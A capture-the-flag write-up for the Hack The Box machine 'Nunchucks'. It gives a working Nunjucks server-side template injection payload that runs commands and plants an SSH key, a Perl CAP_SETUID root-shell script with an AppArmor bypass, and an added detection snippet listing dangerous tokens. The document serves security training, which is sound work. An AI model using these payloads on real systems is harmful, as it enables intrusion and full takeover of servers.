# Nunchucks - Easy

![Nunchucks](https://3759110756-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FVvHHLY2mrxd5y4e2vVYL%2Fuploads%2F6QjYlD2t0PzeOBQFxRt6%2Fimage.png?alt=media\&token=1c7c983b-696f-4750-9970-7603516513d6)

## Introduction@Nunchucks:~$

| Name         | [Nunchucks](https://app.hackthebox.com/machines/Nunchucks) |
| ------------ | ---------------------------------------------------------- |
| IP           | 10.10.11.122                                               |
| Points       | 40                                                         |
| OS           | Linux                                                      |
| Difficulty   | Easy                                                       |
| Creator      | [TheCyberGeek](https://app.hackthebox.com/users/114053)    |
| Release Date | 02 / Nov / 2021                                            |

## Recon

### Nmap

```bash
┌─[sheinn101@parrot]─[~/htb/nunchucks]
└──╼ [??]$ cat nmap.out 
# Nmap 7.92 scan initiated Wed Nov  3 15:20:27 2021 as: nmap -sC -sV -oN nmap.out 10.10.11.122
Nmap scan report for 10.10.11.122
Host is up (0.42s latency).
Not shown: 997 closed tcp ports (reset)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 6c:14:6d:bb:74:59:c3:78:2e:48:f5:11:d8:5b:47:21 (RSA)
|   256 a2:f4:2c:42:74:65:a3:7c:26:dd:49:72:23:82:72:71 (ECDSA)
|_  256 e1:8d:44:e7:21:6d:7c:13:2f:ea:3b:83:58:aa:02:b3 (ED25519)
80/tcp  open  http     nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to https://nunchucks.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
443/tcp open  ssl/http nginx 1.18.0 (Ubuntu)
|_http-title: 400 The plain HTTP request was sent to HTTPS port
|_http-trane-info: Problem with XML parsing of /evox/about
| tls-nextprotoneg: 
|_  http/1.1
| ssl-cert: Subject: commonName=nunchucks.htb/organizationName=Nunchucks-Certificates/stateOrProvinceName=Dorset/countryName=UK
| Subject Alternative Name: DNS:localhost, DNS:nunchucks.htb
| Not valid before: 2021-08-30T15:42:24
|_Not valid after:  2031-08-28T15:42:24
| tls-alpn: 
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Nov  3 15:21:19 2021 -- 1 IP address (1 host up) scanned in 52.42 seconds

```

Only 3 ports are open, and the TLS certificate reveals the DNS name `nunchucks.htb`. So add it to our `/etc/hosts`:

`echo 10.10.11.122 nunchucks.htb | sudo tee -a /etc/hosts`

### Web

![](https://3759110756-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FVvHHLY2mrxd5y4e2vVYL%2Fuploads%2Fjr1Z9JMPN3WsejH7jmXE%2Fimage.png?alt=media\&token=e8303d3a-44c3-4f00-b8b7-b4478fd896fa)

I tried directory bruteforce but found nothing interesting. There is also a signup page, which is currently closed. So there is not much we can do here. Let's look for `vhosts` instead.

### Finding Vhosts

```
┌─[sheinn101@parrot]─[~/htb/nunchucks]
└──╼ [??]$ ffuf -u https://FUZZ.nunchucks.htb -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt 

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : https://FUZZ.nunchucks.htb
 :: Wordlist         : FUZZ: /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

store                   [Status: 200, Size: 4029, Words: 1053, Lines: 102]
```

Found a subdomain called `store.nunchucks.htb`. Add this to `/etc/hosts` as well.

If we go to this domain, we see another web page running `Express`, a JavaScript framework.

![](https://3759110756-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FVvHHLY2mrxd5y4e2vVYL%2Fuploads%2F3444Qn5NsJXEfqFfIvVn%2Fimage.png?alt=media\&token=74a7f8e1-3bfd-4495-8487-0db21061aab7)

When we enter an email and click `Notify Me`, the value is reflected back to us in a message.

![](https://3759110756-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FVvHHLY2mrxd5y4e2vVYL%2Fuploads%2FDig8lFlk5XFIEN8OELtq%2Fimage.png?alt=media\&token=4c7dda58-0543-4935-a8ad-9153a7d9536b)

So I tried `SSTI` like this.

![](https://3759110756-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FVvHHLY2mrxd5y4e2vVYL%2Fuploads%2FaZsLFBnZUP0BKk8gKEhj%2Fimage.png?alt=media\&token=4139e27e-57ba-4fc8-92b3-908305ff5f38)

Now we can confirm there is `Server Side Template Injection`.

After some searching on Google, I found a write-up on getting `code execution` in the `Nunjucks` template engine.

> [Nunchucks](http://disse.cting.org/2016/08/02/2016-08-02-sandbox-break-out-nunjucks-template-engine)

Intercept the request with `Burp` and enter a payload like this:

```
{{range.constructor(\"return global.process.mainModule.require('child_process').execSync('tail /etc/passwd')\")()}}@gmail.com
```

> Note: if you copy from the original website, don't forget to escape the double quotes.

![](https://3759110756-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FVvHHLY2mrxd5y4e2vVYL%2Fuploads%2FuEF2rhxNzryuWSUPo44N%2Fimage.png?alt=media\&token=338d5a4a-0907-458b-a54e-0066481ad30c)

Now we get the content of `/etc/passwd`.
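As an added example (not code from the write-up or from the box), here is how the `Notify Me` handler should treat the submitted value, and how to flag probes like the one above in request logs; the field name `email` and the one-JSON-object-per-line body log format are assumptions.

```javascript
// Added example, not from the original write-up. Field name "email" and the
// one-JSON-object-per-line request-body log format are assumptions.

// Nunjucks syntax markers, plus identifiers the RCE payload above relies on.
const TEMPLATE_MARKERS = /\{\{|\}\}|\{%|%\}/;
const DANGEROUS_TOKENS = /\b(constructor|process|mainModule|require|child_process|execSync|global)\b/;
// Strict allow-list for the field: braces, quotes and parentheses fail here,
// so they never reach the renderer at all.
const EMAIL_RE = /^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$/;

function classifyEmail(value) {
  if (typeof value !== 'string' || value.length > 254) return 'invalid';
  if (TEMPLATE_MARKERS.test(value)) {
    return DANGEROUS_TOKENS.test(value) ? 'ssti-rce-probe' : 'ssti-probe';
  }
  return EMAIL_RE.test(value) ? 'ok' : 'invalid';
}

function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, c => map[c]);
}

// Safe pattern: the template is a fixed string and the user value is data.
// With Nunjucks: nunjucks.renderString('Notified at {{ email }}', { email })
// (autoescape on). The store rendered the user value *as* the template,
// which is why the {{ ... }} inside the email got evaluated.
function buildNotifyMessage(email) {
  const verdict = classifyEmail(email);
  if (verdict !== 'ok') return { status: 400, verdict, body: 'Please enter a valid email address.' };
  return { status: 200, verdict, body: `You will be notified at ${escapeHtml(email)}.` };
}

// Detection: walk request-body log lines and report template-injection probes.
function scanBodyLog(lines) {
  const hits = [];
  for (const line of lines) {
    let body;
    try { body = JSON.parse(line); } catch (e) { continue; }
    const verdict = classifyEmail(body && body.email);
    if (verdict.startsWith('ssti')) hits.push({ verdict, email: body.email });
  }
  return hits;
}

// Constructed sample log: one benign submission, two probes, one junk line.
const SAMPLE_LOG = [
  '{"email":"alice@example.com"}',
  '{"email":"{{7*7}}@example.com"}',
  '{"email":"{{range.constructor(\\"return process.mainModule\\")()}}@gmail.com"}',
  'not json',
];
console.log(scanBodyLog(SAMPLE_LOG));
```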

## Getting User David

I generate an SSH key pair with `ssh-keygen` on my local machine.

```
┌─[sheinn101@parrot]─[~/htb/nunchucks/ssh]
└──╼ [??]$ ssh-keygen -f david
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in david
Your public key has been saved in david.pub
The key fingerprint is:
SHA256:zhOVx8gBnLp4OWrXr3ErJzzFxCnmWguQqm/jIRMpSOk sheinn101@parrot
The key's randomart image is:
+---[RSA 3072]----+
|       ..o.      |
|  .     o. =     |
| o   . . .=.o    |
|+.  o . o.+.     |
|=E . o =S+       |
|... . *oo.o      |
|o..  o B=o.      |
|.oo.o o B+..     |
| +oo .  .Bo      |
+----[SHA256]-----+
```

Write our SSH public key (the contents of `david.pub`) to `/home/david/.ssh/authorized_keys`.

```
{"email":"{{range.constructor(\"return global.process.mainModule.require('child_process').execSync('echo YOUR_SSH_PUBLIC_KEY > /home/david/.ssh/authorized_keys')\")()}}@gmail.com"}
```

The key goes in unquoted: a literal `"` around it would break both the JSON body and the double-quoted string handed to `constructor`.

Then we can log in with `ssh`.

```
┌─[sheinn101@parrot]─[~/htb/nunchucks/ssh]
└──╼ [??]$ ssh -i david david@10.10.11.122
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-86-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon  8 Nov 05:50:27 UTC 2021

  System load:  0.0               Processes:               230
  Usage of /:   48.8% of 6.82GB   Users logged in:         0
  Memory usage: 48%               IPv4 address for ens160: 10.10.11.122
  Swap usage:   0%


10 updates can be applied immediately.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Fri Oct 22 19:09:52 2021 from 10.10.14.6
david@nunchucks:~$ ls
user.txt
david@nunchucks:~$ cat user.txt
d5beec8da1********65e4f46a2a6a
david@nunchucks:~$ 

```

## Privilege Escalation

After some enumeration, there is an interesting file in the `/opt` directory:

```
david@nunchucks:/opt$ ls -al
total 16
drwxr-xr-x  3 root root 4096 Oct 28 17:03 .
drwxr-xr-x 19 root root 4096 Oct 28 17:03 ..
-rwxr-xr-x  1 root root  838 Sep  1 12:53 backup.pl
drwxr-xr-x  2 root root 4096 Oct 28 17:03 web_backups
david@nunchucks:/opt$
```

> backup.pl

```perl
#!/usr/bin/perl
use strict;
use POSIX qw(strftime);
use DBI;
use POSIX qw(setuid); 
POSIX::setuid(0); 

my $tmpdir        = "/tmp";
my $backup_main = '/var/www';
my $now = strftime("%Y-%m-%d-%s", localtime);
my $tmpbdir = "$tmpdir/backup_$now";

sub printlog
{
    print "[", strftime("%D %T", localtime), "] $_[0]\n";
}

sub archive
{
    printlog "Archiving...";
    system("/usr/bin/tar -zcf $tmpbdir/backup_$now.tar $backup_main/* 2>/dev/null");
    printlog "Backup complete in $tmpbdir/backup_$now.tar";
}

if ($> != 0) {
    die "You must run this script as root.\n";
}

printlog "Backup starts.";
mkdir($tmpbdir);
&archive;
printlog "Moving $tmpbdir/backup_$now to /opt/web_backups";
system("/usr/bin/mv $tmpbdir/backup_$now.tar /opt/web_backups/");
printlog "Removing temporary directory";
rmdir($tmpbdir);
printlog "Completed";
```

This script appears to back up `/var/www` into the `web_backups` directory, which is owned by root.

It also calls `POSIX::setuid(0);` to run as root, which only succeeds if the interpreter is SUID or has the relevant capability.

In the `linpeas` output, we can see that the Perl binary has `CAP_SETUID`.

{% hint style="info" %}
CAP_SETUID is granted to programs running as root or to those running as a non-root user that have been explicitly given the CAP_SETUID runtime capability. It is often preferable to use Linux runtime capabilities rather than file capabilities, since using file capabilities to run a program with elevated privileges opens up possible security holes: any user with access to the file can exec() that program to gain the elevated privileges.
{% endhint %}

![](https://3759110756-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FVvHHLY2mrxd5y4e2vVYL%2Fuploads%2FKPVqBYHi3cpbUREQskI8%2Fimage.png?alt=media\&token=03e669f3-d9b1-498f-adb6-eeb2ef9beeaa)

> You can also check with this command: `getcap -r / 2>/dev/null`

### GTFOBins

```bash
perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
```

I ran this one-liner from [GTFOBins](https://gtfobins.github.io/gtfobins/perl/#capabilities), but it did not work. When we run `whoami` through it, it returns root, yet we cannot even read `root.txt`: permission denied.

```
david@nunchucks:/opt$ perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "whoami";'
root
david@nunchucks:/opt$ perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "cat /root/root.txt";'
cat: /root/root.txt: Permission denied
david@nunchucks:/opt$ 
```

But when we put the same one-liner into a script and run it:

```perl
david@nunchucks:/tmp$ cat pwned.pl 
#!/usr/bin/perl
use POSIX qw(setuid);
POSIX::setuid(0);
exec "/bin/bash";
```

```
david@nunchucks:/tmp$ chmod +x pwned.pl 
david@nunchucks:/tmp$ ./pwned.pl 
root@nunchucks:/tmp# id
uid=0(root) gid=1000(david) groups=1000(david)
root@nunchucks:/tmp# cat /root/root.txt
cf715d729***********b1aac2ebdd9e
```

Now we get a shell as root.

> Note: But we can't execute it like this; it says permission denied.

```
david@nunchucks:/tmp$ perl pwned.pl 
Can't open perl script "pwned.pl": Permission denied
david@nunchucks:/tmp$
```

This is weird. After some searching on Google, I found an [article](https://bugs.launchpad.net/apparmor/+bug/1911431) that explains it: `/usr/bin/perl` is confined by an AppArmor profile, so `perl pwned.pl` is denied access to the script, but when a script is executed directly through the `#!/usr/bin/perl` shebang it is not given the same restrictions. The profile is not applied to the script, so it runs with the interpreter's `CAP_SETUID` and `setuid(0)` succeeds. That's it.

![pwned](https://3759110756-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FVvHHLY2mrxd5y4e2vVYL%2Fuploads%2FF8DJirSFlv1Un7WBmtvu%2Fcomplete.gif?alt=media\&token=045fd197-4004-49f4-a8ed-ee28e197008f)

> Author Account : <https://app.hackthebox.com/profile/237587>
